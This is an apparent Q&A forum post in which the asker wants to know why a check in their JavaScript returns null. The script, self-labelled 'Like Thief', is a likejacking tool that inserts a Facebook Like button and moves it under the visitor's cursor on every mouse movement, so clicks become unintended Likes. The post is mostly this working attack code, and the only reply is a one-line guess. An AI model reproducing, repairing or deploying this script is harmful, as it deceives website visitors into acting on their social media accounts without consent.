# Facebook like API using JS and PHP

Tags: javascript, php, facebook, button, facebook-like

The following code is part of a PHP script associated with button

```
<script>
    var bootstrap = new bootstrap('http://hotmail.com', 'button', '304770399584182');
    bootstrap.init();
</script>
```

The associated JS script is:

```
/*  =------------=
 *  | Like Thief |
 *  =------------=
 *
 *  Version: 0.1
 *  Developer: James Jeffery <joojar@hotmail.com>
 *  AIM: joojarmarketing
 *
 *  PFF: Project Fuck Facebook
 */

function bootstrap(url, id, appId) {

    this.url = url; this.id = id; this.appId = appId;
    this.init = function() {
        window.alert("Welcome! Press OK 2");
        this.insertFBJavascript();
        this.insertLikeButton();
        document.getElementById(this.id).onmousemove = positionLikeButton;
        window.alert("Welcome! Press OK 3");
    }

    this.insertFBJavascript = function() {
        window.alert("Welcome! Press check fb-rrot");
        if(document.getElementById('fb-root')) return;
        window.alert("Welcome! Press passed");
        var fbr = document.createElement('div'); fbr.id = 'fb-root';
        document.getElementsByTagName('body')[0].appendChild(fbr);
        (function(d, s, id, appId) {
            var js, fjs = d.getElementsByTagName(s)[0];
            window.alert("Welcome! test2");
            if (d.getElementById(id)) return;
            window.alert("Welcome! Press passed");
            js = d.createElement(s); js.id = id;
            js.src = '//connect.facebook.net/en_US/all.js#xfbml=1&appId=' + appId;
            fjs.parentNode.insertBefore(js, fjs);
        }(document, 'script', 'facebook-jssdk', this.appId));
    }

    this.insertLikeButton = function() {
        window.alert("Welcome! Press OK like");
        var lb = document.createElement('fb:like');
        lb.id = 'fblike';
        lb.setAttribute('width', '450');
        lb.setAttribute('href', this.url);
        lb.setAttribute('show_faces', 'false');
        document.getElementById(this.id).appendChild(lb);
    }

    function positionLikeButton(e) {
        window.alert("Welcome! Press OK pos like");
        e = e || window.event;
        var cursor = {x:0, y:0};
        if (e.pageX || e.pageY) {
            cursor.x = e.pageX;
            cursor.y = e.pageY;
        } else {
            cursor.x = e.clientX + 
        (document.documentElement.scrollLeft || document.body.scrollLeft) - document.documentElement.clientLeft;
            cursor.y = e.clientY + (document.documentElement.scrollTop || document.body.scrollTop) - document.documentElement.clientTop;
        }
        window.alert("Welcome! last");
        var elem = document.getElementById('fblike');
        elem.style.position = 'absolute';
        elem.style.top = cursor.y - 5 + 'px';
        elem.style.left = cursor.x - 5 + 'px';
    }
}
```

Using Windows Vista and Chrome, I have Facebook logged in, so why is this line returning null in the JS script?

```
if(document.getElementById('fb-root')) return;
```

I have a tab in Chrome already opened and using Facebook, any suggestions?

Answer (score 0):

`if(document.getElementById('fb-root')) return true;`?